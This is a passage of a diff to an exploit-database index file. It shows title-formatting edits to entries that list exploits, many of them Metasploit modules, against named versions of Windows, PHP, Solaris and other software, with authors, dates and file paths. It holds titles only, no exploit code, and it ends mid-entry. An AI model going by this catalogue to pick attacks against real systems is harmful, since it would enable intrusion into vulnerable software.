15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0 @@ -13413,7 +13409,7 @@ id,file,description,date,author,platform,type,port 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0 15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local DoS PoC (0day)",2010-11-04,"Nikita Tarakanov",windows,dos,0 15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0 -15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 +15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal Vulnerability (0day)",2010-11-05,"Yakir Wizman",windows,remote,0 15428,platforms/multiple/dos/15428.rb,"Avidemux <= 2.5.4 - Buffer Overflow Vulnerability",2010-11-05,The_UnKn@wn,multiple,dos,0 @@ -13438,7 +13434,7 @@ id,file,description,date,author,platform,type,port 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 -15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0 +15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) - Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0 15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0 15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0 @@ -13523,7 +13519,7 @@ id,file,description,date,author,platform,type,port 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion Vulnerability",2010-11-18,FL0RiX,php,webapps,0 15568,platforms/php/webapps/15568.py,"chCounter <= 3.1.3 - SQL Injection Vulnerability",2010-11-18,"Matias Fontanini",php,webapps,0 -15569,platforms/windows/local/15569.rb,"MP3-Nator Buffer Overflow (SEH - DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 +15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH - DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 @@ -13810,9 +13806,9 @@ id,file,description,date,author,platform,type,port 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service Vulnerability",2011-01-07,freak_out,windows,dos,0 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 SCADA HMI Heap Overflow PoC",2011-01-09,"Dillon Beresford",windows,remote,0 15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 -15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 +15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 15936,platforms/windows/local/15936.py,"VideoSpirit Pro <= 1.68 - Local BoF Exploit",2011-01-08,xsploitedsec,windows,local,0 -15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent Remote Buffer Overflow",2011-01-08,ikki,multiple,remote,0 +15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0 15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0 15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0 @@ -13939,7 +13935,7 @@ id,file,description,date,author,platform,type,port 16101,platforms/windows/remote/16101.py,"FTPGetter 3.58.0.21 - Buffer Overflow (PASV) Exploit",2011-02-03,modpr0be,windows,remote,0 16102,platforms/php/webapps/16102.txt,"Islam Sound IV2 - (details.php) Remote SQL Injection",2011-02-03,ZxH-Labs,php,webapps,0 16103,platforms/multiple/remote/16103.txt,"Majordomo2 - Directory Traversal (SMTP/HTTP)",2011-02-03,"Michael Brooks",multiple,remote,0 -16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal Vulnerability",2011-02-03,modpr0be,windows,remote,0 +16105,platforms/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal Vulnerability (1)",2011-02-03,modpr0be,windows,remote,0 16106,platforms/php/webapps/16106.txt,"OemPro 3.6.4 - Multiple Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - (.rtx) Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 @@ -14096,7 +14092,7 @@ id,file,description,date,author,platform,type,port 16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 ITms Overflow",2010-11-11,metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java Statement.invoke() Trusted Method Chain Exploit",2010-12-15,metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java JRE AWT setDiffICM Buffer Overflow",2010-09-20,metasploit,multiple,remote,0 -16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 escape() Return Value Memory Corruption",2010-09-20,metasploit,multiple,remote,0 +16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,metasploit,multiple,remote,0 16300,platforms/multiple/remote/16300.rb,"Mozilla Suite/Firefox Navigator Object Code Execution",2010-09-20,metasploit,multiple,remote,0 16301,platforms/multiple/remote/16301.rb,"Firefox location.QueryInterface() Code Execution",2010-09-20,metasploit,multiple,remote,0 16302,platforms/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execuction",2011-01-08,metasploit,multiple,remote,0 @@ -14106,7 +14102,7 @@ id,file,description,date,author,platform,type,port 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,metasploit,windows,remote,0 16307,platforms/multiple/local/16307.rb,"PeaZip <= 2.6.1 Zip Processing Command Injection",2010-09-20,metasploit,multiple,local,0 16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,metasploit,multiple,remote,0 -16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-20,metasploit,multiple,remote,0 +16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (1)",2010-09-20,metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String Vulnerability",2010-11-30,metasploit,linux,remote,0 16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,metasploit,multiple,remote,0 @@ -14126,8 +14122,8 @@ id,file,description,date,author,platform,type,port 16326,platforms/solaris/remote/16326.rb,"Solaris ypupdated Command Execution",2010-07-25,metasploit,solaris,remote,0 16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd TTYPROMPT Buffer Overflow",2010-06-22,metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris Telnet Remote Authentication Bypass Vulnerability",2010-06-22,metasploit,solaris,remote,0 -16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow",2010-04-05,metasploit,solaris,remote,0 -16330,platforms/solaris_sparc/remote/16330.rb,"Samba trans2open Overflow (Solaris SPARC)",2010-06-21,metasploit,solaris_sparc,remote,0 +16329,platforms/solaris/remote/16329.rb,"Samba lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,metasploit,solaris,remote,0 +16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service Overflow",2010-06-22,metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Windows Media Services ConnectFunnel Stack Buffer Overflow",2010-04-28,metasploit,windows,remote,0 @@ -14197,7 +14193,7 @@ id,file,description,date,author,platform,type,port 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (1)",2010-05-09,metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL Overflow",2010-04-30,metasploit,windows,remote,0 @@ -14206,20 +14202,20 @@ id,file,description,date,author,platform,type,port 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve Tape Engine Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service TCP Overflow",2010-04-30,metasploit,windows,remote,0 -16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-11-03,metasploit,windows,remote,0 +16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (2)",2010-11-03,metasploit,windows,remote,0 16410,platforms/windows/remote/16410.rb,"Computer Associates Alert Notification Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-11-03,metasploit,windows,remote,0 +16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (3)",2010-11-03,metasploit,windows,remote,0 16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow",2010-10-05,metasploit,windows,remote,0 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe Media Service Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",2010-11-03,metasploit,windows,remote,0 16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow",2010-11-04,metasploit,windows,remote,0 -16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow",2010-10-05,metasploit,windows,remote,0 +16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (1)",2010-10-05,metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve Message Engine Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 +16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,metasploit,windows,remote,0 +16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 - PRIVMSG Handling Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow",2010-11-30,metasploit,windows,remote,0 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,metasploit,windows,remote,0 @@ -14232,7 +14228,7 @@ id,file,description,date,author,platform,type,port 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16435,platforms/windows/remote/16435.rb,"HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16437,platforms/windows/remote/16437.rb,"Borland InterBase isc_create_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA Topology DELETEDEVICE Overflow",2010-09-20,metasploit,windows,remote,0 @@ -14243,7 +14239,7 @@ id,file,description,date,author,platform,type,port 16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit",2010-08-25,metasploit,windows,remote,0 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client Buffer Overflow Exploit",2010-10-09,metasploit,windows,remote,0 +16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (Windows)",2010-10-09,metasploit,windows,remote,0 16447,platforms/windows/remote/16447.rb,"Borland InterBase isc_attach_database() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault Remote Heap Overflow",2010-09-20,metasploit,windows,remote,0 16449,platforms/windows/remote/16449.rb,"Borland InterBase SVC_attach() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 @@ -14252,14 +14248,14 @@ id,file,description,date,author,platform,type,port 16452,platforms/windows/remote/16452.rb,"AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,metasploit,windows,remote,0 16453,platforms/windows/remote/16453.rb,"Borland Interbase Create-Request Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net Font Field Overflow",2010-06-15,metasploit,windows,remote,0 -16455,platforms/windows/remote/16455.rb,"HP OmniInet.exe MSG_PROTOCOL Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,metasploit,windows,remote,0 @@ -14276,9 +14272,9 @@ id,file,description,date,author,platform,type,port 16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,metasploit,windows,remote,0 16478,platforms/windows/remote/16478.rb,"Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16479,platforms/windows/remote/16479.rb,"IMail IMAP4D Delete Overflow",2010-09-20,metasploit,windows,remote,0 +16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow",2010-09-20,metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable IMAPD W3C Logging Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 IMAP Login Buffer Overflow",2010-08-25,metasploit,windows,remote,0 +16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow",2010-08-25,metasploit,windows,remote,0 16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16483,platforms/windows/remote/16483.rb,"Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14291,7 +14287,7 @@ id,file,description,date,author,platform,type,port 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,metasploit,windows,remote,0 -16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,metasploit,windows,remote,0 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit",2011-01-22,metasploit,multiple,remote,0 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16497,platforms/windows/remote/16497.rb,"RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14300,13 +14296,13 @@ id,file,description,date,author,platform,type,port 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView ActiveX Control Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 16501,platforms/windows/remote/16501.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",2010-09-21,metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16503,platforms/windows/local/16503.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-04-30,metasploit,windows,local,0 +16503,platforms/windows/local/16503.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability (1)",2010-04-30,metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe util.printf() Buffer Overflow",2010-05-03,metasploit,windows,local,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",2010-07-16,metasploit,windows,remote,0 16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client ActiveX Control Buffer Overflow",2008-06-16,metasploit,windows,remote,0 -16509,platforms/windows/remote/16509.rb,"Mozilla Firefox Interleaving document.write and appendChild Exploit",2011-02-22,metasploit,windows,remote,0 +16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit",2011-02-22,metasploit,windows,remote,0 16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager Stack Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16511,platforms/windows/remote/16511.rb,"Logitech VideoCall ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 @@ -14322,7 +14318,7 @@ id,file,description,date,author,platform,type,port 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client ActiveX Control target-frame Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player SceneURL Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger goaway Overflow",2010-07-03,metasploit,windows,remote,0 +16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow",2010-07-03,metasploit,windows,remote,0 16526,platforms/windows/remote/16526.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,metasploit,windows,remote,0 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",2010-05-04,metasploit,windows,remote,0 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14343,7 +14339,7 @@ id,file,description,date,author,platform,type,port 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail epi.dll AuthCredential Format String Exploit",2010-09-20,metasploit,windows,remote,0 16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,metasploit,windows,remote,0 -16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-20,metasploit,windows,local,0 +16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,metasploit,windows,local,0 16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,metasploit,windows,remote,0 16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,metasploit,windows,remote,0 16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14353,7 +14349,7 @@ id,file,description,date,author,platform,type,port 16553,platforms/windows/remote/16553.rb,"BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16554,platforms/windows/remote/16554.rb,"America Online ICQ ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption",2010-07-12,metasploit,windows,remote,0 -16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow",2010-05-09,metasploit,windows,local,0 +16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow",2010-05-09,metasploit,windows,local,0 16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",2011-01-08,metasploit,windows,remote,0 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer ActiveX Control Buffer Overflow",2010-04-30,metasploit,windows,remote,0 @@ -14403,7 +14399,7 @@ id,file,description,date,author,platform,type,port 16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 16604,platforms/windows/remote/16604.rb,"WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",2010-09-20,metasploit,windows,remote,0 -16606,platforms/windows/local/16606.rb,"Adobe Collab.getIcon() Buffer Overflow",2010-04-30,metasploit,windows,local,0 +16606,platforms/windows/local/16606.rb,"Adobe Collab.getIcon() Buffer Overflow (1)",2010-04-30,metasploit,windows,local,0 16607,platforms/windows/remote/16607.rb,"WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 @@ -14411,25 +14407,25 @@ id,file,description,date,author,platform,type,port 16611,platforms/windows/remote/16611.rb,"Winamp 